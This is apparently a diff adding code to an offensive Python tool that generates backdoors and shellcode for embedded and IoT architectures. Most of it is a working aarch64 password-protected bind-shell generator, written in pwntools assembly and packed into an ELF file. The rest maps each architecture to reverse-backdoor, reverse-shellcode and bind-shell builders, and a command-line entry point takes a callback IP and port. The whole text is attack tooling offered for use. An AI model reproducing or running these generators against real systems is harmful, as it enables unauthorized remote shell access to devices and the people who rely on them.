+aarch64 aarch64_bind_shell
+
+add 2022.11.2
+'''
+def aarch64_bind_shell(listen_port, passwd, filename = None):
+	context.arch = 'aarch64'
+	context.endian = 'little'
+	context.bits = '64'
+	log.success("bind port is set to "+ str(listen_port))
+	log.success("passwd is set to '%s'"%passwd )
+	listen_port = '0x'+enhex(p16(listen_port))
+	passwd_len = hex(len(passwd))
+	#passwd = '0x'+enhex(p64(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(16,"0")
+	passwd = "0x"+enhex(p64(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(16,"0")
+	passwd_high = passwd[:6]
+	passwd_high2 = '0x'+passwd[6:10]
+	passwd_low = '0x' + passwd[10:14]
+	passwd_low2 = '0x' + passwd[14:]
+	shellcode = '''
+	mov x8, #198
+	lsr x1, x8, #7
+	lsl x0, x1, #1
+	mov x2, xzr
+	svc #0x1337
+	mvn x4, x0
+	'''
+	shellcode += '''
+	lsl  x1, x1, #1
+	movk x1, #%s , lsl #16
+	str  x1, [sp, #-8]!
+	add  x1, sp, x2
+	mov  x2, #16
+	mov  x8, #200
+	svc #0x1337
+
+	mvn  x0, x4
+	lsr  x1, x2, #3
+	mov  x8, #201
+	svc #0x1337
+	mov x5, x1
+
+	mvn  x0, x4
+	mov  x1, xzr
+	mov  x2, xzr
+	mov  x8, #202
+	svc  #0x1337
+
+
+	mvn  x4, x0
+	lsl  x1, x5, #1
+	mvn  x4, x0
+	lsr  x1, x1, #1
+	mov  x2, xzr
+	mov  x8, #24
+	svc  #0x1337
+	mov  x10, xzr
+	cmp  x10, x1
+	bne  -0x18
+	mov  x14, #24912
+	movk x14, #29555, lsl #16
+	movk x14, #25719, lsl #0x20
+	movk x14, #8250, lsl #0x30
+	mov  x15, xzr
+	stp x14, x15, [sp, #-16]!
+	mov  x1, sp
+	mvn  x0, x4
+	mov  x2, #8
+	/* call write() */
+	mov  x8, #SYS_write
+	svc 0
+
+	sub sp, sp, 0x30
+	mvn x0, x4
+	mov x1, sp
+	mov x2, #%s
+	mov x8, #0x3f
+	svc #0x1337
+
+	mov x14, #%s
+	movk x14, #%s , lsl #16
+	movk x14, #%s , lsl #0x20
+	movk x14, #%s , lsl #0x30
+
+	ldr x15, [sp,#0]!
+	cmp x15, x14
+	bne 0x1888
+	'''
+	shellcode += shellcraft.execve("/bin/sh",['/bin/sh'],0)
+	shellcode = asm(shellcode % (listen_port, passwd_len, passwd_low2, passwd_low, passwd_high2, passwd_high))
+	data=make_elf(shellcode)
+	log.info("waiting 3s")
+	sleep(1)
+	if(filename==None):
+		f=open("./aarch64_bind_shell","wb")
+		f.write(data)
+		f.close()
+		log.success("aarch64_bind_shell is ok in current path ./")
+	context.arch = 'i386'
+	context.bits = "32"
+	context.endian = "little"
+
+
+
+'''
+this is help for print Using Help
+'''
+def Introduction():
+	example_reverse = '''
+    If you need to obtain more functions, use the following functions (One of them can):
+    1. Visit github below: https://github.com/doudoudedi/hackEmbedded
+    2. help(hackebds)
+    2. Simple example: mipsel_backdoor("127.0.0.1",8899)
+	'''
+	print(example_reverse)
+
+reverse_backdoor_dic = {
+    1: mips_backdoor,
+    2: mipsel_backdoor,
+    3: mips64_backdoor,
+    4: mips64el_backdoor,
+    5: armelv5_backdoor,
+    6: armelv7_backdoor,
+    7: None,
+    8: armebv7_backdoor,
+    9: aarch64_backdoor,
+    10: None,
+    11: None,
+    12: android_aarch64_backdoor
+}
+
+reverse_shellcode_dic = {
+	1: mips_reverse_sl,
+	2: mipsel_reverse_sl,
+	3: mips64_reverse_sl,
+	4: mips64el_reverse_sl,
+	5: armelv5_reverse_sl,
+	6: armelv7_reverse_sl,
+	7: armebv5_reverse_sl,
+	8: armebv7_reverse_sl,
+	9: aarch64_reverse_sl,
+	10: None,
+	11: None,
+	12: None
+}
+
+bind_shell_dic = {
+	1: mips_bind_shell,
+	2: mipsel_bind_shell,
+	3: None,
+	4: None,
+	5: None,
+	6: armelv7_bind_shell,
+	7: None,
+	8: armv7eb_bind_shell,
+	9: aarch64_bind_shell,
+	10: x86_bind_shell,
+	11: x64_bind_shell,
+	12: None
+}
+
+
+arch_2_num_dic ={
+	'mips': 1,
+	'mipsel': 2,
+	'mips64': 3,
+	'mipsel64': 4,
+	'armelv5': 5,
+	'armelv7': 6,
+	'armebv5': 7,
+	'armebv7': 8,
+	'aarch64': 9,
+	'x86': 10,
+	'x64': 11,
+	'android': 12
+
+}
+
+
+def arch_get_number(input_arch):
+
+	fun = arch_2_num_dic.get(input_arch)
+	return fun
+
+def num_getreverse_file(number, reverse_ip, reverse_port):
+
+    fun = reverse_backdoor_dic.get(number)
+    return fun(reverse_ip, reverse_port)
+
+def num_getreverse_shellcode(number, reverse_ip, reverse_port):
+
+	fun = reverse_shellcode_dic.get(number)
+	return fun(reverse_ip, reverse_port)
+
+def num_getbind_shell(number, listen_port, passwd):
+
+	fun = bind_shell_dic.get(number)
+	return fun(listen_port, passwd)
+
+def main():
+	parser = argparse.ArgumentParser()
+	parser.add_argument('-reverse_ip', required=True, type=str, default=None, help='reverse_ip set')
+	parser.add_argument('-reverse_port', required=True, type=int, help='reverse_port set')
+	parser.add_argument('-arch', required=True, type=str, help='Target arch architecturet', choices=('mips','mipsel','mips64','mipsel64','armelv5','armelv7','armebv5','armebv7','aarch64','x86','x64','aarch64','android'))
+	parser.add_argument('-res', required=True, type=str,default="reverse_shell_file")
+	parser.add_argument('-passwd', required=False, type=str,default=None)
+	args = parser.parse_args()
+	if (args.res == "reverse_shell_file"):
+		try:
+			num_getreverse_file(arch_get_number(args.arch), args.reverse_ip, args.reverse_port)
+		except Exception as e:
+		#	print(e)
+			log.info("The function is still under development. Please wait")
+
+	if (args.res == "reverse_shellcode"):
+		try:
+			num_getreverse_shellcode(arch_get_number(args.arch), args.reverse_ip, args.reverse_port)
+		except Exception as e:
+			log.info("The function is still under development. Please wait")
+	if (args.res == "bind_shell"):
+		try:
+			if (args.passwd==None):
+				log.error("please set bind passwd")
+				return
+			num_getbind_shell(arch_get_number(args.arch), args.reverse_port, args.passwd)
+		except Exception as e:
+			#print(e)
+			pass
+
+
+
+if __name__ == "__main__":
+	main()
+
